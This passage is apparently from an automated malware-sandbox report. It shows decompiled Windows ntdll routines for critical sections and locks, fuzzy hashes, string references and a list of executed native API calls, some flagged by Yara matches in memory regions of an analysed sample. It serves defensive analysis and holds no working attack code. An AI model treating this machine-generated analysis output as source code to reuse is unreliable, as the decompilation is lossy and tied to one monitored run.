                                    				signed int _t37;
                                    				signed int _t40;
                                    				signed int _t42;
                                    				void* _t45;
                                    				intOrPtr _t46;
                                    				signed int _t49;
                                    				void* _t51;
                                    				signed int _t57;
                                    				signed int _t64;
                                    				signed int _t71;
                                    				void* _t74;
                                    				intOrPtr _t78;
                                    				signed int* _t79;
                                    				void* _t85;
                                    				signed int _t86;
                                    				signed int _t92;
                                    				void* _t104;
                                    				void* _t105;
                                    
                                    				_t64 = _a4;
                                    				_t32 =  *(_t64 + 0x28);
                                    				_t71 = _t64 + 0x28;
                                    				_push(_t92);
                                    				if(_t32 < 0) {
                                    					_t78 =  *[fs:0x18];
                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                    						goto L3;
                                    					} else {
                                    						__eflags = _t32 | 0xffffffff;
                                    						asm("lock xadd [ecx], eax");
                                    						return 1;
                                    					}
                                    				} else {
                                    					L3:
                                    					_push(_t86);
                                    					while(1) {
                                    						L4:
                                    						__eflags = _t32;
                                    						if(_t32 == 0) {
                                    							break;
                                    						}
                                    						__eflags = _a8;
                                    						if(_a8 == 0) {
                                    							__eflags = 0;
                                    							return 0;
                                    						} else {
                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                    							_t79 = _t64 + 0x24;
                                    							_t71 = 1;
                                    							asm("lock xadd [eax], ecx");
                                    							_t32 =  *(_t64 + 0x28);
                                    							_a4 = _t32;
                                    							__eflags = _t32;
                                    							if(_t32 != 0) {
                                    								L19:
                                    								_t86 = 0;
                                    								__eflags = 0;
                                    								while(1) {
                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                    									asm("sbb esi, esi");
                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x008101c0;
                                    									_push(_t92);
                                    									_push(0);
                                    									_t37 = E0072F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                    									__eflags = _t37 - 0x102;
                                    									if(_t37 != 0x102) {
                                    										break;
                                    									}
                                    									_t71 =  *(_t92 + 4);
                                    									_t85 =  *_t92;
                                    									_t51 = E00774FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                    									_push(_t85);
                                    									_push(_t51);
                                    									E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                    									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                    									_t86 = _t86 + 1;
                                    									_t105 = _t104 + 0x28;
                                    									__eflags = _t86 - 2;
                                    									if(__eflags > 0) {
                                    										E007B217A(_t71, __eflags, _t64);
                                    									}
                                    									_push("RTL: Re-Waiting\n");
                                    									_push(0);
                                    									_push(0x65);
                                    									E00783F92();
                                    									_t104 = _t105 + 0xc;
                                    								}
                                    								__eflags = _t37;
                                    								if(__eflags < 0) {
                                    									_push(_t37);
                                    									E00773915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                    									asm("int3");
                                    									_t40 =  *_t71;
                                    									 *_t71 = 0;
                                    									__eflags = _t40;
                                    									if(_t40 == 0) {
                                    										L1:
                                    										_t42 = E00755384(_t92 + 0x24);
                                    										if(_t42 != 0) {
                                    											goto L31;
                                    										} else {
                                    											goto L2;
                                    										}
                                    									} else {
                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                    										_push( &_a4);
                                    										_push(_t40);
                                    										_t49 = E0072F970( *((intOrPtr*)(_t92 + 0x18)));
                                    										__eflags = _t49;
                                    										if(__eflags >= 0) {
                                    											goto L1;
                                    										} else {
                                    											_push(_t49);
                                    											E00773915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                    											L31:
                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                    											_push( &_a4);
                                    											_push(1);
                                    											_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
                                    											__eflags = _t42;
                                    											if(__eflags >= 0) {
                                    												L2:
                                    												return _t42;
                                    											} else {
                                    												_push(_t42);
                                    												E00773915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                    												_push( &_a4);
                                    												_push(1);
                                    												_t42 = E0072F970( *((intOrPtr*)(_t92 + 0x20)));
                                    												__eflags = _t42;
                                    												if(__eflags >= 0) {
                                    													goto L2;
                                    												} else {
                                    													_push(_t42);
                                    													_t45 = E00773915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                    													asm("int3");
                                    													while(1) {
                                    														_t74 = _t45;
                                    														__eflags = _t45 - 1;
                                    														if(_t45 != 1) {
                                    															break;
                                    														}
                                    														_t86 = _t86 | 0xffffffff;
                                    														_t45 = _t74;
                                    														asm("lock cmpxchg [ebx], edi");
                                    														__eflags = _t45 - _t74;
                                    														if(_t45 != _t74) {
                                    															continue;
                                    														} else {
                                    															_t46 =  *[fs:0x18];
                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                    															return _t46;
                                    														}
                                    														goto L37;
                                    													}
                                    													E00755329(_t74, _t92);
                                    													_push(1);
                                    													return E007553A5(_t92);
                                    												}
                                    											}
                                    										}
                                    									}
                                    								} else {
                                    									_t32 =  *(_t64 + 0x28);
                                    									continue;
                                    								}
                                    							} else {
                                    								_t71 =  *_t79;
                                    								__eflags = _t71;
                                    								if(__eflags > 0) {
                                    									while(1) {
                                    										_t57 = _t71;
                                    										asm("lock cmpxchg [edi], esi");
                                    										__eflags = _t57 - _t71;
                                    										if(_t57 == _t71) {
                                    											break;
                                    										}
                                    										_t71 = _t57;
                                    										__eflags = _t57;
                                    										if(_t57 > 0) {
                                    											continue;
                                    										}
                                    										break;
                                    									}
                                    									_t32 = _a4;
                                    									__eflags = _t71;
                                    								}
                                    								if(__eflags != 0) {
                                    									continue;
                                    								} else {
                                    									goto L19;
                                    								}
                                    							}
                                    						}
                                    						goto L37;
                                    					}
                                    					_t71 = _t71 | 0xffffffff;
                                    					_t32 = 0;
                                    					asm("lock cmpxchg [edx], ecx");
                                    					__eflags = 0;
                                    					if(0 != 0) {
                                    						goto L4;
                                    					} else {
                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                    						return 1;
                                    					}
                                    				}
                                    				L37:
                                    			}

























                                    0x00000000
                                    0x00789166
                                    0x00789166
                                    0x00789171
                                    0x00789176
                                    0x00789176
                                    0x00000000
                                    0x00789160
                                    0x007923c6
                                    0x007923cb
                                    0x007923d7
                                    0x007923d7
                                    0x007923ad
                                    0x00792390
                                    0x00792373
                                    0x0079233f
                                    0x0079233f
                                    0x00000000
                                    0x0079233f
                                    0x00792291
                                    0x00792291
                                    0x00792293
                                    0x00792295
                                    0x0079229a
                                    0x007922a1
                                    0x007922a3
                                    0x007922a7
                                    0x007922a9
                                    0x00000000
                                    0x00000000
                                    0x007922ab
                                    0x007922ad
                                    0x007922af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922af
                                    0x007922b1
                                    0x007922b4
                                    0x007922b4
                                    0x007922b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x007922b6
                                    0x0079228f
                                    0x00000000
                                    0x0079226d
                                    0x007553cb
                                    0x007553ce
                                    0x007553d0
                                    0x007553d4
                                    0x007553d6
                                    0x00000000
                                    0x007553d8
                                    0x007553e3
                                    0x007553ea
                                    0x007553ea
                                    0x007553d6
                                    0x00000000

                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007922F4
                                    Strings
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007922FC
                                    • RTL: Re-Waiting, xrefs: 00792328
                                    • RTL: Resource at %p, xrefs: 0079230B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-871070163
                                    • Opcode ID: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                    • Instruction ID: 617c8ec89938efa80c4a1cb6ff93843e3e6c22bb7d26e354bf558c5284d7d131
                                    • Opcode Fuzzy Hash: 176a540a19378ff52b2f9e19780f0a3f78eadc503e5092e143d51d0303dcb6fa
                                    • Instruction Fuzzy Hash: BD513B71600701BBDF10AB28DC85FE67398AF55764F114229FD08DB282E6A9ED468790
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E0075EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v24;
                                    				intOrPtr* _v28;
                                    				intOrPtr _v32;
                                    				signed int _v36;
                                    				intOrPtr _v40;
                                    				short _v66;
                                    				char _v72;
                                    				void* __esi;
                                    				intOrPtr _t38;
                                    				intOrPtr _t39;
                                    				signed int _t40;
                                    				intOrPtr _t42;
                                    				intOrPtr _t43;
                                    				signed int _t44;
                                    				void* _t46;
                                    				intOrPtr _t48;
                                    				signed int _t49;
                                    				intOrPtr _t50;
                                    				intOrPtr _t53;
                                    				signed char _t67;
                                    				void* _t72;
                                    				intOrPtr _t77;
                                    				intOrPtr* _t80;
                                    				intOrPtr _t84;
                                    				intOrPtr* _t85;
                                    				void* _t91;
                                    				void* _t92;
                                    				void* _t93;
                                    
                                    				_t80 = __edi;
                                    				_t75 = __edx;
                                    				_t70 = __ecx;
                                    				_t84 = _a4;
                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                    					E0074DA92(__ecx, __edx, __eflags, _t84);
                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                    				}
                                    				_push(0);
                                    				__eflags = _t38 - 0xffffffff;
                                    				if(_t38 == 0xffffffff) {
                                    					_t39 =  *0x81793c; // 0x0
                                    					_push(0);
                                    					_push(_t84);
                                    					_t40 = E007316C0(_t39);
                                    				} else {
                                    					_t40 = E0072F9D4(_t38);
                                    				}
                                    				_pop(_t85);
                                    				__eflags = _t40;
                                    				if(__eflags < 0) {
                                    					_push(_t40);
                                    					E00773915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                    					asm("int3");
                                    					while(1) {
                                    						L21:
                                    						_t76 =  *[fs:0x18];
                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                    							_v66 = 0x1722;
                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_t76 =  &_v72;
                                    							_push( &_v72);
                                    							_v28 = _t85;
                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_push(0x10);
                                    							_push(0x20402);
                                    							E007301A4( *0x7ffe0382 & 0x000000ff);
                                    						}
                                    						while(1) {
                                    							_t43 = _v8;
                                    							_push(_t80);
                                    							_push(0);
                                    							__eflags = _t43 - 0xffffffff;
                                    							if(_t43 == 0xffffffff) {
                                    								_t71 =  *0x81793c; // 0x0
                                    								_push(_t85);
                                    								_t44 = E00731F28(_t71);
                                    							} else {
                                    								_t44 = E0072F8CC(_t43);
                                    							}
                                    							__eflags = _t44 - 0x102;
                                    							if(_t44 != 0x102) {
                                    								__eflags = _t44;
                                    								if(__eflags < 0) {
                                    									_push(_t44);
                                    									E00773915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                    									asm("int3");
                                    									E007B2306(_t85);
                                    									__eflags = _t67 & 0x00000002;
                                    									if((_t67 & 0x00000002) != 0) {
                                    										_t7 = _t67 + 2; // 0x4
                                    										_t72 = _t7;
                                    										asm("lock cmpxchg [edi], ecx");
                                    										__eflags = _t67 - _t67;
                                    										if(_t67 == _t67) {
                                    											E0075EC56(_t72, _t76, _t80, _t85);
                                    										}
                                    									}
                                    									return 0;
                                    								} else {
                                    									__eflags = _v24;
                                    									if(_v24 != 0) {
                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                    									}
                                    									return 2;
                                    								}
                                    								goto L36;
                                    							}
                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                    							_push(_t67);
                                    							_t46 = E00774FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                    							_push(_t77);
                                    							E00783F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                    							_t48 =  *_t85;
                                    							_t92 = _t91 + 0x18;
                                    							__eflags = _t48 - 0xffffffff;
                                    							if(_t48 == 0xffffffff) {
                                    								_t49 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                    							}
                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                    							_push(_t49);
                                    							_t50 = _v12;
                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                    							_push(_t85);
                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                    							E00783F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                    							_t53 =  *_t85;
                                    							_t93 = _t92 + 0x20;
                                    							_t67 = _t67 + 1;
                                    							__eflags = _t53 - 0xffffffff;
                                    							if(_t53 != 0xffffffff) {
                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                    							}
                                    							__eflags = _t67 - 2;
                                    							if(_t67 > 2) {
                                    								__eflags = _t85 - 0x8120c0;
                                    								if(_t85 != 0x8120c0) {
                                    									_t76 = _a4;
                                    									__eflags = _a4 - _a8;
                                    									if(__eflags == 0) {
                                    										E007B217A(_t71, __eflags, _t85);
                                    									}
                                    								}
                                    							}
                                    							_push("RTL: Re-Waiting\n");
                                    							_push(0);
                                    							_push(0x65);
                                    							_a8 = _a4;
                                    							E00783F92();
                                    							_t91 = _t93 + 0xc;
                                    							__eflags =  *0x7ffe0382;
                                    							if( *0x7ffe0382 != 0) {
                                    								goto L21;
                                    							}
                                    						}
                                    						goto L36;
                                    					}
                                    				} else {
                                    					return _t40;
                                    				}
                                    				L36:
                                    			}


































                                    Strings
                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007924BD
                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0079248D
                                    • RTL: Re-Waiting, xrefs: 007924FA
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                    • API String ID: 0-3177188983
                                    • Opcode ID: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                    • Instruction ID: ccecc2dcbb6b071fd3e107c012a6e81c582c39697ccf4ca897e8668307f5a3c1
                                    • Opcode Fuzzy Hash: 12b4d72e27fa7f8322d06c4a7a044918107d7e27006ab8e447ea1f96f249d165
                                    • Instruction Fuzzy Hash: 7D41D8B0600204FBDB24EB68DC89FAA77B9EF44710F208615F955D72D2D67CED528760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: __fassign
                                    • String ID:
                                    • API String ID: 3965848254-0
                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction ID: 3c123995bb8216e2d328b87d6bbdc2c6c000a0e32058bc97e5d35d372c73db28
                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                    • Instruction Fuzzy Hash: CF91D671E0020AEFDF24DF58D8456EEBBB4FF55304F24807AD842A7162E7395A51CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • Set 0x%X protection for %p section for %d bytes, old protection 0x%X, xrefs: 007AE893
                                    • ]x, xrefs: 007AE75B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: _wcstoul
                                    • String ID: Set 0x%X protection for %p section for %d bytes, old protection 0x%X$]x
                                    • API String ID: 1097018459-3343864547
                                    • Opcode ID: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                    • Instruction ID: bd677a5325f568174c220776ac0db13bf5c9d48c7bc308bd63513658312d371a
                                    • Opcode Fuzzy Hash: 25cea16187418f65a94f002e54d1e26c17bd52413924c558e6d4ea6293bedfc6
                                    • Instruction Fuzzy Hash: D441B172C00249EADF10DFE4C885BEEB7B8AF86310F10966AF551A7081E77CDA94C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0076FED6: ___swprintf_l.LIBCMT ref: 0076FEFD
                                    • ___swprintf_l.LIBCMT ref: 0079EA87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    • Associated: 00000005.00000002.2208285591.0000000000710000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208376195.0000000000800000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208380533.0000000000810000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208384693.0000000000814000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208388517.0000000000817000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208392240.0000000000820000.00000040.00000001.sdmp
                                    • Associated: 00000005.00000002.2208418416.0000000000880000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: 4b}w$:%u
                                    • API String ID: 48624451-1257435289
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 0076C5BB
                                    • 1s, xrefs: 0076C56F
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: 1s${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                    • API String ID: 48624451-1946412030
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcstoul.LIBCMT ref: 007AE901
                                      • Part of subcall function 007E5AA6: __cftof.LIBCMT ref: 007E5AB6
                                    Strings
                                    • ]x, xrefs: 007AE8E3
                                    • CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X, xrefs: 007AE91B
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2208290057.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true
                                    Similarity
                                    • API ID: __cftof_wcstoul
                                    • String ID: CLIENT(ntdll): Tyring to fix protection for %ws section in %wZ module to 0x%X$]x
                                    • API String ID: 1831096779-1492471241
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    APIs
                                    • NtQueryInformationProcess.NTDLL ref: 008E691F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: InformationProcessQuery
                                    • String ID: 0
                                    • API String ID: 1778838933-4108050209
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: Section$CloseCreateView
                                    • String ID: @$@
                                    • API String ID: 1133238012-149943524
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: Section$CreateView
                                    • String ID: @$@
                                    • API String ID: 1585966358-149943524
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • NtQueryInformationProcess.NTDLL ref: 008E691F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378156801.00000000008E0000.00000040.00000001.sdmp, Offset: 008E0000, based on PE: false
                                    Similarity
                                    • API ID: InformationProcessQuery
                                    • String ID: 0
                                    • API String ID: 1778838933-4108050209
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: M;
                                    • API String ID: 2738559852-3261960221
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: .z`
                                    • API String ID: 823142352-1441809116
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID: =
                                    • API String ID: 3535843008-3560468456
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2378259143.00000000022A0000.00000040.00000001.sdmp, Offset: 02290000, based on PE: true
                                    • Associated: 00000007.00000002.2378253920.0000000002290000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378345340.0000000002380000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378351184.0000000002390000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378357251.0000000002394000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378363645.0000000002397000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378369400.00000000023A0000.00000040.00000001.sdmp
                                    • Associated: 00000007.00000002.2378402410.0000000002400000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
